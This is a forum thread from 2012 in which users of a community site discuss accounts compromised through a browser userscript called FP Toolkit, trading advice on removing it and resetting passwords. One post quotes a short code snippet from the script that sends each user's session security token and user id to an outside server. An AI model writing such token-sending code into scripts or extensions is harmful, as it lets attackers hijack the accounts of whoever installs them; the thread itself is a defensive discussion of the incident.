• Ask us about the forums: READ THE OP or get BANNED.
    1,057 replies, posted
Also I've used FP Toolkit before will change my pass when I'm home again and uninstall it.
[QUOTE=Jessey;34476306]Also I've used FP Toolkit before will change my pass when I'm home again and uninstall it.[/QUOTE] Be sure to remove it before changing the pass.
[QUOTE=Pnukup;34476337]Be sure to remove it before changing the pass.[/QUOTE] Aye will do, will also just remove cookies/cache and whatever just incase.
[QUOTE=Craptasket;34475068]i am a dumb platypus[/QUOTE] No you're not Tasket, you're the best mod ever forever n ever.
[QUOTE=Maximum Mod;34476272][img]http://dl.dropbox.com/u/5606926/facepunch/fbi.PNG[/img] Facepunch Bureau of Investigatinators?[/QUOTE] Remove by the Female body inspector (garry) gmoof content
I wonder, did our passwords leak or just our session cookies?
[QUOTE=VistaPOWA;34476625]I wonder, did our passwords leak or just our session cookies?[/QUOTE] Just the cookies I think
I think I missed the fun, what just happened?
[QUOTE=garry;34475293]Yeah it's FP Toolkit - should have never had that shit installed in the first place. Don't know whether it's an exploit in the script itself or some exploit that used the script? [url]http://jessecar96.net/fp/fp_tools.js[/url][/QUOTE] Thanks for the FP toolkit, saves me a few months of waiting :downs:
[QUOTE=matthaios;34476692]Thanks for the FP toolkit, saves me a few months of waiting :downs:[/QUOTE] Have fun getting compromised. [editline]31st January 2012[/editline] :smile:
[QUOTE=TerabyteS_;34476683]I think I missed the fun, what just happened?[/QUOTE] exploit in fp toolkit, some gold accounts compromised, massive shitstorm in GD, everyone banned, passwords changed and unbanned
So what's up with visitor messages? No matter how many times I turn them on/off (or set it for certain usergroups) in my settings the tab doesn't seem to appear in my profile.
[QUOTE=matthaios;34476692]Thanks for the FP toolkit, saves me a few months of waiting :downs:[/QUOTE] Enjoy it, it's 100 % safe.
[QUOTE=matthaios;34476692]Thanks for the FP toolkit, saves me a few months of waiting :downs:[/QUOTE] Bye.
Even though I removed the fp toolkit thing and changed my password twice I still feel at risk :tinfoil: but yeah this is going to make me think twice before installing any fp scripts
[QUOTE=Jessey;34477067]Bye.[/QUOTE] You know apart from the fact it's only the extention that's compromised people and not the normal script.
so i should change my password if I have fptoolkit, right
[QUOTE=Dubious George;34477130]You know apart from the fact it's only the extention that's compromised people and not the normal script.[/QUOTE] No it's not. The extension works the same as the userscript.
The guy who did this had to have access to Jessecar's server. So it was him or someone else who accessed his server. No exploits here, just shit coding.
[QUOTE=The First 11'er;34477216]so i should change my password if I have fptoolkit, right[/QUOTE] Yes, right after you remove it. You're using chrome too, you're lucky you still have your account.
Logging in and logging out is the only thing you need to do, the attacker only has your session cookies.
Oh wow, did you really think I'd install it? I may be a little strange but I'm not dumb.
[QUOTE=Dubious George;34476198]Quick note: Benlecyborg also had access to the script and developed for it, so it was possibly him and/and not jessecar[/QUOTE] The mystery continues, though I wouldn't be surprised if ben did it.
Wow I'm stuck at school when my acc at home still has fptoolkit installed And now we play the waiting game
Will threads close on a monthly basis no matter what or only if they have over 3000 posts?
[QUOTE=wootmonster;34477999]Will threads close on a monthly basis no matter what or only if they have over 3000 posts?[/QUOTE] Probably just any thread over 3000 posts. What's the point in closing the small threads, they don't need new versions.
Jessecar did not do this, neitherdid Benlecyborg. They are both good people, and like Benlecyborg just said, it was probably done by someone else, using a virus and a backdoor. The FP Toolkit is very useful. I hope it will still be worked on later :/
[QUOTE=Benlecyborg;34479046]Fuck that after this I'm not touching anything to do with scripts.[/QUOTE] this is the quote. I believe some guy got access to the server it was running off and then added this. [QUOTE=Meatspin;34477354]So according to VistaPOWA the FP Toolkit was responsible for the compromised accounts Looked through it and found this: [code] $.ajax({ type: "POST", url: "http://jessecar96.net/fp/fpalts.php", data: "array="+hashjson+"&user="+FT_userid+"&security="+SECURITYTOKEN+"&hiddenstring=1234&tools=1", success: function(html){ console.log(html); } });[/code] SECURITYTOKEN is pretty much your vBulletin session token If you cant see what this is doing, it sends your security token to his site Judging from the makers previous achivements his site could have been hacked, or jessecar96 did it himself[/QUOTE] [editline]31st January 2012[/editline] [url]http://jessecar96.net/fp/fpalts.php[/url] this looks bad.
Alright. There is a virus on my server somehow. I don't think it's related to my script. Just uninstall it and don't go on my server at all. I'll see what's going on.
[QUOTE=Generic Jesse;34479084]Alright. There is a virus on my server somehow. I don't think it's related to my script. Just uninstall it and don't go on my server at all. I'll see what's going on.[/QUOTE] I hope you get the script working again!
Sorry, you need to Log In to post a reply to this thread.